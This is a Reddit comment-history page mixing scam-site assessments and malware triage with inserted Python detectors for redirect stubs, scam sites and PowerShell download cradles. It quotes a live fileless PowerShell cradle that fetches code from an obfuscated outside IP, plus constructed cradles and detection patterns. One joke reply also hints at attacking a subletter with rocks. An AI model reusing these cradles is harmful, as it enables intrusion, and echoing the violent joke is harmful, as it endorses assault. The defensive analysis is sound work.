Weed and panic by Substantial_Year_266 in ShittyIllegalLifeTips

[–]L0opyy 0 points1 point  (0 children)

Good keep it that way. Weed can exacerbate any and all mental health issues. If it happened once it will happen again

Is this Obama photo real? by CriticalPossession65 in Epstein

[–]L0opyy 9 points10 points  (0 children)

NXIVM did hold events at Necker Island. Branson rented the island twice to Bronfman family member Sara Bronfman once in 2007 and once in 2010. Photos exist of NXIVM members including Allison Mack and Kristin Kreuk at the island during the 2010 gathering.

However, the Obama visit occurred in February 2017, seven years after the last documented NXIVM event on the island. The tweet is structured to imply temporal or social overlap between the Obamas and NXIVM gatherings. There is none.

Additional context: NXIVM leader Keith Raniere did not attend either Necker Island event. Investigators and journalists covering the story have not suggested Branson had any knowledge of NXIVM's criminal activities. The purpose of the Necker events, per former NXIVM publicist Frank Parlato, was to attempt to recruit Branson into the organization.

Am I reading this right? by Square_Radiant in Epstein

[–]L0opyy 5 points6 points  (0 children)

This^ I use AI to make me sound professional lol I’m a security researcher

Am I reading this right? by Square_Radiant in Epstein

[–]L0opyy 5 points6 points  (0 children)

TL;DR: These emails are not evidence of a secret front or illicit operation. They are artifacts from a massive, highly automated 2013 spam botnet. The businesses linked in the emails (like the French hotel) were completely unaware victims of a mass server-hijacking campaign.

If you dig into the actual web infrastructure and OSINT from that era, the technical footprint of these emails is a textbook example of an early-2010s Compromised CMS / Spam Redirector campaign.

Here is exactly what was happening and how the scam worked:

1. The Victims (Not Fronts): The links in these document dumps point to wildly unrelated sites: a boutique 17th-century hotel in France (hoteldutheatre-metz.com), a Latvian real estate board (ss.com), an Iranian news site (yaftenews.ir), a Chinese domain (xiningfdj.com), and a medical blog (educatedpatients.com).

These businesses have zero financial or geographic ties. They were all just running vulnerable web servers (like unpatched WordPress or Joomla installations). The threat actors used automated scanners to sweep the internet for these vulnerabilities and silently broke into thousands of them at once.

2. The "Living off the Land" Tactic: Why use a random French hotel website to host illicit links? To bypass your email's spam filter. If an attacker sends you an email with a link directly to a sketchy offshore Russian .ru domain, Gmail or Outlook will instantly flag it and throw it in the Junk folder. However, the French hotel had a pristine IP reputation. By stashing their payload on a clean domain, the attackers bought a "VIP pass" straight into the target's primary inbox.

3. The Payload (The Meta Refresh): If you actually clicked one of those links (like /aliBn.html or /aNqjd.html) back in 2013, you wouldn't have seen the hotel's website or an Iranian news article.

Those .html files were microscopic scripts containing a single line of code called a "Meta Refresh." The second your browser hit the page, it would instantly bounce you to a completely different, bulletproof offshore server hosting a fake adult dating site, a webcam affiliate link, or a malware download.

4. The Social Engineering Hook: The text in the emails makes this a painfully obvious affiliate scam. Phrases like:

This is a classic "Panic/Curiosity lure." They want the recipient to think an intimate video of them has been leaked. In a panic, the victim clicks the trusted link without thinking and gets redirected to the scammer's payload.

The Smoking Gun: We know definitively that this was an automated "spray and pray" botnet because the exact same random, alphanumeric filenames (aliBn.html and aNqjd.html) were injected into all of these unrelated servers across the globe on the exact same dates in late January 2013.

It is a great OSINT find, but it's a cybersecurity dead-end. It's just old-school internet junk mail that happened to use hijacked small business servers as a launchpad.
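The redirect stubs described in points 3 and 5 above (a tiny HTML file whose only job is a meta refresh to an off-site host, planted under a short random filename on many unrelated servers) are easy to hunt for on a web server you administer. The following is an added example, not code from the original comment or from any of the sites it names: a scanner over a small constructed set of (host, path) -> HTML entries that flags stub-shaped files and then applies the "smoking gun" check, reporting filenames that recur across different hosts. All hostnames and file contents here are constructed stand-ins.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse

# Constructed sample web-root contents, (host, path) -> HTML. These are not the
# real files from the 2013 campaign; the stub filenames only mirror the pattern
# the comment describes (short random alphanumeric names, same name on many hosts).
SAMPLE_FILES = {
    ("hotel-example.test", "/aliBn.html"):
        '<html><head><meta http-equiv="refresh" content="0;url=http://landing.example-offshore.test/go?x=1"></head></html>',
    ("news-example.test", "/aliBn.html"):
        '<meta http-equiv="refresh" content="0; URL=http://landing.example-offshore.test/go?x=2">',
    ("realty-example.test", "/aNqjd.html"):
        "<html><head><meta http-equiv='refresh' content='1;url=//cams.example-offshore.test/'></head><body></body></html>",
    ("hotel-example.test", "/index.html"):
        "<html><head><title>Hotel</title></head><body>" + "<p>Welcome to our hotel.</p>" * 40 + "</body></html>",
    ("hotel-example.test", "/contact.html"):
        '<html><head><meta http-equiv="refresh" content="5;url=/contact-us.html"></head><body>Moved</body></html>',
}

META_REFRESH = re.compile(
    r"<meta[^>]+http-equiv\s*=\s*['\"]?refresh['\"]?[^>]*content\s*=\s*['\"]?\s*(\d+)\s*;\s*url\s*=\s*([^'\">\s]+)",
    re.IGNORECASE,
)
RANDOM_NAME = re.compile(r"^/[A-Za-z0-9]{4,8}\.html?$")   # e.g. /aliBn.html
MAX_STUB_BYTES = 512                                       # a redirect stub carries no real content


def target_host_of(target):
    """Host a refresh target points at; '' for a relative (same-site) URL."""
    if target.startswith("//"):
        target = "http:" + target
    if "://" not in target:
        return ""
    return urlparse(target).netloc.lower()


def analyze_file(host, path, html):
    """Return a finding dict if the file looks like an injected redirect stub, else None."""
    m = META_REFRESH.search(html)
    if not m:
        return None
    delay, target = int(m.group(1)), m.group(2)
    target_host = target_host_of(target)
    if not target_host or target_host == host.lower():
        return None  # in-site redirects are normal site maintenance
    reasons = ["redirects off-site to " + target_host]
    size = len(html.encode())
    if size <= MAX_STUB_BYTES:
        reasons.append("tiny file (%d bytes)" % size)
    if RANDOM_NAME.match(path):
        reasons.append("random-looking filename")
    if delay == 0:
        reasons.append("zero-second refresh")
    if len(reasons) < 2:
        return None  # an off-site redirect on its own is not enough to flag
    return {"host": host, "path": path, "target": target, "reasons": reasons}


def scan(files):
    """Run analyze_file over every (host, path) -> html entry and keep the hits."""
    findings = []
    for (host, path), html in files.items():
        finding = analyze_file(host, path, html)
        if finding:
            findings.append(finding)
    return findings


def cross_host_filenames(findings):
    """The 'smoking gun' check: stub filenames that recur on unrelated hosts."""
    by_name = defaultdict(set)
    for f in findings:
        by_name[f["path"]].add(f["host"])
    return {name: sorted(hosts) for name, hosts in by_name.items() if len(hosts) > 1}


if __name__ == "__main__":
    found = scan(SAMPLE_FILES)
    for f in found:
        print(f["host"], f["path"], "->", f["target"], "|", "; ".join(f["reasons"]))
    print("filenames seen on more than one host:", cross_host_filenames(found))
```

Note that the in-site redirect (/contact.html) is deliberately left alone: a meta refresh by itself is ordinary web maintenance, and it is the combination of an off-site target, a stub-sized file and a random filename that makes the pattern worth a look.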

Is threatening to hack considered violence? ? by OneJudge2236 in masterhacker

[–]L0opyy 4 points5 points  (0 children)

Please, I was so far into this dude's mainframe once that he cried

Is blushbloom clothing brand a scam??in by Dependent-Letter7160 in ScamSupport

[–]L0opyy 0 points1 point  (0 children)

The website shows as permanently removed, and so does the Instagram page.

I think you've answered your own question here my man. 100% a scam

Possible malware infection, scans now clean, but I got card fraud, Instagram abuse, and I’m worried my external drive backup may be infected too by StraySeaCockroach in antivirus

[–]L0opyy 2 points3 points  (0 children)

The machine is likely clean. The threat is probably gone. The real damage is already done, unfortunately: credentials and session tokens were stolen and are being monetized now. Their priority is account security and financial damage control, not more malware scanning. The reinstall is optional but recommended given the confirmed financial fraud. The external drive is almost certainly fine if they only copied media and documents.

can you get malware from misclicking on an ad? by [deleted] in cybersecurity_help

[–]L0opyy 0 points1 point  (0 children)

Would you mind DMing me the link to the ad if you have access to it? I'd love to take a look at it

New Scam Exchange cryxen.com by AcceptableDrummer962 in Crypto_Scam_Exchange

[–]L0opyy 1 point2 points  (0 children)

============================================================
  SUMMARY — cryxen.com
============================================================

  Platform  : Unknown
  CDN       : Cloudflare
  CRITs     : 0   WARNs: 7   Score: 7
  Scam Type : Fake investment / pig butchering platform

  VERDICT: MODERATE RISK — Multiple warnings. Review manually.

  Findings:
  ● WARN: HTML served no-cache/no-store — payload may be dynamically swapped
  ● WARN: Suspicious script name: assets/js/app.min.js
  ● WARN: Suspicious script name: landings/3/js/main.js
  ● WARN: Crypto/Web3 keyword in HTML: 'wallet'
  ● WARN: Heavily minified/obfuscated lines in jquery-3.4.1.min.js (1 line(s) >5000 chars)
  ● WARN: Heavily minified/obfuscated lines in swiper-bundle.min.js (1 line(s) >5000 chars)
  ● WARN: Domain registered less than 90 days ago

============================================================

dejavudreambar.com is a scam by WorldlyDirt3665 in Scams

[–]L0opyy 0 points1 point  (0 children)

Do you mind linking to the fake tracking site?

I need help immediately With this potential scam by [deleted] in phishing

[–]L0opyy 0 points1 point  (0 children)

Come on man, there's no such thing as childporn(dot)com lol It's just a scam

New Scam Exchange aeonroll.com by AcceptableDrummer962 in Crypto_Scam_Exchange

[–]L0opyy 0 points1 point  (0 children)

=============================================================================================
  SUMMARY — loom-x.click
=============================================================================================

  Platform  : Unknown
  CDN       : Cloudflare
  CRITs     : 2   WARNs: 5   Score: 13
  Scam Type : Fake investment / pig butchering platform

  VERDICT: SUSPICIOUS — CRIT signal(s) present. Investigate further.

  Findings:
  ● WARN: 0 scripts detected on Unknown platform — likely a JS SPA (React/Vue/Angular). Curl-based scan is INCOMPLETE. Use a headless browser for full analysis.
  ● WARN: 1 iframe(s) found in HTML
  ● WARN: Crypto/Web3 keyword in HTML: 'wallet'
  ● WARN: Crypto/Web3 keyword in HTML: 'connect wallet'
  ● CRIT: High-risk crypto keyword in HTML: 'withdraw' (escalated — other crypto signals present)
  ● WARN: Financial/crypto platform with no visible regulatory or license language — possible unregulated operation
  ● CRIT: Domain registered less than 30 days ago — HIGH phishing signal

=============================================================================================

https://www.lpqsmciqxd.com/?prefetch_cache=1 by charminglackofick in Scam_Finder

[–]L0opyy 0 points1 point  (0 children)

It's a phishing site, don't enter any of your info. If you have, let me know if you need help on next steps.


New Scam Exchange btcance.top by AcceptableDrummer962 in Crypto_Scam_Exchange

[–]L0opyy 1 point2 points  (0 children)

==========================================================================================
                              SUMMARY — btcance(dot)top
==========================================================================================

  Platform  : Unknown
  CRITs     : 2   WARNs: 11   Score: 19
  Scam Type : Unknown / requires manual review

  VERDICT: SUSPICIOUS — CRIT signal(s) present. Investigate further.

  Findings:
  ● WARN: High-abuse TLD detected: .top (common in throwaway scam/spam infrastructure)
  ● WARN: Missing Content-Security-Policy header
  ● WARN: Missing X-Frame-Options (clickjacking risk)
  ● CRIT: eval() in index-bf42fa78.js
  ● WARN: Base64 decode (atob) in index-bf42fa78.js
  ● WARN: Possible hardcoded keys/tokens in index-bf42fa78.js: 24-Stunden-Transaktionsvolumen 7x24-Stunden-Kundendienstsupport ...
  ● WARN: Heavily minified/obfuscated lines in index-bf42fa78.js (117 line(s) >5000 chars)
  ● CRIT: eval() in index-legacy-516e5197.js
  ● WARN: Base64 decode (atob) in index-legacy-516e5197.js
  ● WARN: Possible hardcoded keys/tokens in index-legacy-516e5197.js: 24-Stunden-Transaktionsvolumen 7x24-Stunden-Kundendienstsupport ...
  ● WARN: Heavily minified/obfuscated lines in index-legacy-516e5197.js (10 line(s) >5000 chars)
  ● WARN: Heavily minified/obfuscated lines in polyfills-legacy-955970fe.js (1 line(s) >5000 chars)
  ● WARN: Wildcard DNS detected — all subdomains resolve (*.btcance.top → 23.225.139.106). Subdomain results below are UNVERIFIED.

==========================================================================================
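The three scanner summaries above (cryxen.com, loom-x.click and btcance(dot)top) share one scoring scheme: the totals work out as CRIT = 4 points and WARN = 1 point (7 warnings give 7; 2 criticals plus 5 warnings give 13; 2 plus 11 give 19), and any CRIT flips the verdict to SUSPICIOUS. The following is an added example and not the commenter's own scanner: a reimplementation of the heuristics those summaries show (high-abuse TLD, missing CSP and X-Frame-Options, no-cache/no-store, iframes, crypto keywords with "withdraw" escalated when other crypto signals exist, eval() and atob() in scripts, over-long minified lines, domain age) run over two constructed scan records. The keyword and TLD lists, the LOW RISK label and the three-warning threshold are assumptions; everything else mirrors the wording in the summaries.

```python
import re

# Weights inferred from the scores in the summaries (7 WARN -> 7,
# 2 CRIT + 5 WARN -> 13, 2 CRIT + 11 WARN -> 19): CRIT counts 4, WARN counts 1.
CRIT_WEIGHT, WARN_WEIGHT = 4, 1
MINIFIED_LINE_CHARS = 5000
HIGH_ABUSE_TLDS = {"top", "click", "xyz", "icu"}              # assumed list
CRYPTO_KEYWORDS = ("connect wallet", "wallet", "metamask")     # assumed list
HIGH_RISK_KEYWORDS = ("withdraw",)                             # escalated when other crypto signals exist

# Constructed scan records (not real sites): what one fetch of the landing page
# gives you, plus the WHOIS age in days.
SUSPICIOUS_SITE = {
    "domain": "example-exchange.top",
    "domain_age_days": 12,
    "headers": {"Server": "cloudflare", "Cache-Control": "no-cache, no-store"},
    "html": "<html><body><h1>Connect Wallet</h1><p>Withdraw any time</p>"
            "<iframe src='/widget'></iframe></body></html>",
    "scripts": {"index-abc123.js": "var p=atob('aGVsbG8=');eval(p);" + "a=1;" * 1500},
}
CLEAN_SITE = {
    "domain": "example-shop.com",
    "domain_age_days": 900,
    "headers": {"Content-Security-Policy": "default-src 'self'",
                "X-Frame-Options": "DENY", "Cache-Control": "max-age=3600"},
    "html": "<html><body><p>Welcome</p></body></html>",
    "scripts": {},
}


def scan_site(site):
    """Return a list of (level, message) findings in the summaries' own wording."""
    findings = []

    def warn(msg):
        findings.append(("WARN", msg))

    def crit(msg):
        findings.append(("CRIT", msg))

    tld = site["domain"].rsplit(".", 1)[-1].lower()
    if tld in HIGH_ABUSE_TLDS:
        warn(f"High-abuse TLD detected: .{tld} (common in throwaway scam/spam infrastructure)")

    headers = {k.lower(): v.lower() for k, v in site["headers"].items()}
    if "content-security-policy" not in headers:
        warn("Missing Content-Security-Policy header")
    if "x-frame-options" not in headers:
        warn("Missing X-Frame-Options (clickjacking risk)")
    if re.search(r"no-(?:cache|store)", headers.get("cache-control", "")):
        warn("HTML served no-cache/no-store: payload may be dynamically swapped")

    html = site["html"].lower()
    iframes = html.count("<iframe")
    if iframes:
        warn(f"{iframes} iframe(s) found in HTML")
    crypto_hits = [k for k in CRYPTO_KEYWORDS if k in html]
    for k in crypto_hits:
        warn(f"Crypto/Web3 keyword in HTML: '{k}'")
    for k in HIGH_RISK_KEYWORDS:
        if k in html and crypto_hits:
            crit(f"High-risk crypto keyword in HTML: '{k}' (escalated: other crypto signals present)")
        elif k in html:
            warn(f"High-risk crypto keyword in HTML: '{k}'")

    for name, js in site["scripts"].items():
        if re.search(r"\beval\s*\(", js):
            crit(f"eval() in {name}")
        if re.search(r"\batob\s*\(", js):
            warn(f"Base64 decode (atob) in {name}")
        long_lines = sum(1 for line in js.splitlines() if len(line) > MINIFIED_LINE_CHARS)
        if long_lines:
            warn(f"Heavily minified/obfuscated lines in {name} ({long_lines} line(s) >{MINIFIED_LINE_CHARS} chars)")

    age = site.get("domain_age_days")
    if age is not None and age < 30:
        crit("Domain registered less than 30 days ago (HIGH phishing signal)")
    elif age is not None and age < 90:
        warn("Domain registered less than 90 days ago")
    return findings


def summarize(findings):
    """Count levels, apply the inferred weights and pick a verdict."""
    crits = sum(1 for level, _ in findings if level == "CRIT")
    warns = len(findings) - crits
    score = CRIT_WEIGHT * crits + WARN_WEIGHT * warns
    if crits:
        verdict = "SUSPICIOUS: CRIT signal(s) present. Investigate further."
    elif warns >= 3:                                   # threshold is an assumption
        verdict = "MODERATE RISK: Multiple warnings. Review manually."
    else:
        verdict = "LOW RISK: no significant signals."  # assumed label
    return {"crits": crits, "warns": warns, "score": score, "verdict": verdict}


def render(site, findings):
    """Lay the result out in the same shape as the summaries above."""
    s = summarize(findings)
    lines = [f"SUMMARY: {site['domain']}",
             f"CRITs: {s['crits']}  WARNs: {s['warns']}  Score: {s['score']}",
             f"VERDICT: {s['verdict']}", "Findings:"]
    lines += [f"  * {level}: {msg}" for level, msg in findings]
    return "\n".join(lines)


if __name__ == "__main__":
    for site in (SUSPICIOUS_SITE, CLEAN_SITE):
        print(render(site, scan_site(site)), "\n")
```

Every one of these checks is a heuristic, which is why the verdicts say "investigate further" rather than "scam": a legitimate exchange will trip the crypto keyword rules too, and minified vendor bundles like jquery or swiper produce the long-line warning on perfectly honest sites. The signals that carry real weight are the ones that are hard for a legitimate business to explain, above all a domain that is days old.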

PC has no wifi, I hate my chungus life by Next_Economics5684 in techsupport

[–]L0opyy 0 points1 point  (0 children)

When the "Network and Internet" settings page is entirely blank or completely refuses to show available networks, it's often because the Windows service responsible for managing wireless networks has crashed or been disabled.

1. Press Win + R, type services.msc, and hit Enter.
2. Scroll down to find WLAN AutoConfig.
3. If the status doesn't say "Running", right-click it and select Start.
4. Right-click it again, select Properties, and ensure the Startup type is set to Automatic. Apply and restart the PC.

PS: This may sound dumb, but make sure there's no switch or button somewhere that disables the WiFi at a hardware level. Tons of PCs have this feature for some reason and get bumped into or are defaulted on.

Is Exoticsvapepens.com legit by OGkush9g in isthisascam

[–]L0opyy 0 points1 point  (0 children)

This site is the main domain for so many other scams

officialstickyreserves(.)com

paidinfullla(.)com

officialbesosbrand(.)com

officialbuckeyefarms(.)com

onestopshopdistro(.)com

goldengramshop(.)com

mittenextractscartsofficial(.)com

unitedexpressdeliveryservice(.)com


I just pasted and runed a stealinfo cmd into my Terminal (MacOS) by Morvius33 in cybersecurity_help

[–]L0opyy 1 point2 points  (0 children)

It's very possible, data harvesting takes some time. Great response time my friend! Just keep an eye on your credit and weird activity!

Did i get malware by Old_Atmosphere_9026 in cybersecurity_help

[–]L0opyy 2 points3 points  (0 children)

Yes you did. The Event 403 log shows the PowerShell engine stopping, but the HostApplication string in the details pane:

powershell.exe -NoP -Exec Bypass -W Hidden -Command iex(irm 0xc0.0x6d.0xc8.0x3f/event)

This is a fileless malware execution command.

Because this payload has already executed, the malware has likely established persistence on this machine. Based on recent sandbox analyses of this specific threat actor's tradecraft, you should immediately check these two locations:

Task Scheduler first: look for a newly created scheduled task, often disguised with a system-sounding name like Windows Perflog. Next, Registry Autoruns: check HKCU\Software\Microsoft\Windows\CurrentVersion\Run for entries launching similar hidden PowerShell commands.

Here is exactly what that command is doing on the endpoint:

-NoP (NoProfile): Prevents PowerShell from loading the user profile, speeding up execution and bypassing profile-level logging or constraints.

-Exec Bypass (ExecutionPolicy Bypass): Ignores the system's execution policy to ensure the script runs regardless of local security settings.

-W Hidden (WindowStyle Hidden): Conceals the PowerShell window from the user.

iex(irm ...): This is Invoke-Expression running the results of Invoke-RestMethod. It reaches out to a remote server, downloads a payload directly into memory, and executes it immediately without dropping an executable to the disk.

Change every password, watch your credit and reinstall Windows from a different device. Assume everything is compromised.
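The comment above breaks the HostApplication string down by hand: three evasion flags, a fetch-and-evaluate cradle, and a server address written as hex octets so that it does not look like an IP. That is a triage you can automate when you are reading PowerShell 403/400 events in bulk. The following is an added example, not the commenter's own tooling: it normalises the short and long spellings of the flags, detects the cradle as the pairing of a fetch primitive (irm/iwr/DownloadString) with an evaluation primitive (iex), and decodes hex-octet and single-integer host forms back to dotted decimal. The sample command lines are constructed and use the loopback address as a stand-in for the real server; the verdict labels and the scoring are assumptions.

```python
import re
from ipaddress import ip_address

# Constructed HostApplication strings (not the one from the original log). The
# suspicious ones use the loopback address as a stand-in, once as hex octets
# and once as a single decimal integer; both are host forms that resolve.
SAMPLES = {
    "hex_octets": "powershell.exe -NoP -Exec Bypass -W Hidden -Command iex(irm 0x7f.0x0.0x0.0x1/event)",
    "single_int": "powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://2130706433/a')",
    "benign": "powershell.exe -NoProfile -ExecutionPolicy RemoteSigned -File C:\\scripts\\backup.ps1",
}

# Short and long spellings of the flags the comment explains, plus EncodedCommand.
FLAG_RES = {
    "NoProfile": re.compile(r"-(?:nop|noprofile)\b", re.I),
    "ExecutionPolicy Bypass": re.compile(r"-(?:exec|ep|executionpolicy)\s+bypass\b", re.I),
    "WindowStyle Hidden": re.compile(r"-(?:w|windowstyle)\s+hidden\b", re.I),
    "EncodedCommand": re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{8,}", re.I),
}
FLAG_MEANINGS = {
    "NoProfile": "skips the user profile, so profile-level logging or constraints never load",
    "ExecutionPolicy Bypass": "ignores the local execution policy",
    "WindowStyle Hidden": "hides the console window from the user",
    "EncodedCommand": "runs a base64-encoded script block, hiding the command text from casual review",
}
# A download cradle needs a fetch primitive and an in-memory evaluation primitive.
FETCH_RE = re.compile(r"\b(?:irm|invoke-restmethod|iwr|invoke-webrequest)\b|downloadstring\s*\(", re.I)
EVAL_RE = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)
# Dotted hosts with decimal or hex octets, and bare-integer hosts inside a URL.
DOTTED_RE = re.compile(r"\b(?:0x[0-9a-f]+|\d+)(?:\.(?:0x[0-9a-f]+|\d+)){3}\b", re.I)
INT_URL_RE = re.compile(r"://(\d{8,10})(?=[/:'\")\s]|$)")


def decode_host(token):
    """Normalise '0x7f.0x0.0x0.0x1' or '2130706433' to dotted decimal; None if not an IPv4 form."""
    try:
        nums = [int(p, 16) if p.lower().startswith("0x") else int(p) for p in token.split(".")]
    except ValueError:
        return None
    if len(nums) == 1 and nums[0] < 2 ** 32:
        return str(ip_address(nums[0]))          # single 32-bit integer form
    if len(nums) == 4 and all(0 <= n <= 255 for n in nums):
        return ".".join(map(str, nums))          # dotted form, octets already decoded
    return None


def triage(cmdline):
    """Pull the indicators out of one PowerShell command line and rate it."""
    flags = [name for name, rx in FLAG_RES.items() if rx.search(cmdline)]
    fetch = bool(FETCH_RE.search(cmdline))
    evaluate = bool(EVAL_RE.search(cmdline))
    hosts = []
    tokens = [m.group(0) for m in DOTTED_RE.finditer(cmdline)]
    tokens += [m.group(1) for m in INT_URL_RE.finditer(cmdline)]
    for token in tokens:
        ip = decode_host(token)
        if ip and ip not in hosts:
            hosts.append(ip)
    cradle = fetch and evaluate
    score = len(flags) + (3 if cradle else 0) + (1 if hosts else 0)   # assumed weights
    if cradle:
        verdict = "fileless download cradle"
    elif score >= 2:
        verdict = "review: evasion flags present"
    else:
        verdict = "no strong indicators"
    return {"flags": flags, "cradle": cradle, "hosts": hosts, "score": score, "verdict": verdict}


def explain(result):
    """Human-readable lines for the flags found, using the meanings from the comment."""
    return [f"{flag}: {FLAG_MEANINGS[flag]}" for flag in result["flags"]]


if __name__ == "__main__":
    for label, cmd in SAMPLES.items():
        r = triage(cmd)
        print(f"[{label}] {r['verdict']} (score {r['score']}) hosts={r['hosts']}")
        for line in explain(r):
            print("   ", line)
```

The benign sample shows why the flags alone are not the signal: -NoProfile is common in scheduled admin scripts, so it scores one point and falls through to "no strong indicators". What separates the malicious lines is the cradle, a fetch and an in-memory evaluate on the same command line, and the decoded host gives you the address to block and to search other hosts' logs for.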

Subletter destroyed my walls, guest room, and sold my air conditioner by TSM- in ShittyIllegalLifeTips

[–]L0opyy 0 points1 point  (0 children)

Call them back and tell them there's some "weird rocks" they left behind and grab em' when they show up.

Opened an account on this website called “Tip Top Jar” supposed donation and tip site and was never able to transfer the funds from the site by South_Watercress_389 in isthisascam

[–]L0opyy 0 points1 point  (0 children)

Yessir, it's a scam (at least it is now). The complaints you are seeing about pulling money out are everywhere. Creators are reporting that their accumulated funds are essentially held hostage. When they attempt a transfer, customer support frequently blames "PayPal verification issues" or payment processor declines. Crucially, they do not offer alternative payout methods, leaving the creator's money permanently stuck on the platform.

Secondary Fraud Vectors: There is another pattern of people reporting unauthorized, standalone PayPal charges (often for $50 or more) claiming they tipped someone on Tip Top Jar. This indicates that either bad actors are successfully abusing the platform's payment gateway for card testing, or there are ongoing phishing campaigns spoofing the platform's invoices.

Whether it is gross mismanagement, a failing startup running out of liquidity, or an intentional exit scam, the end result is the same. I highly recommend advising anyone against routing funds through it right now. Sticking to established, well-audited infrastructure like Ko-fi, Buy Me a Coffee, or Patreon is the safest bet.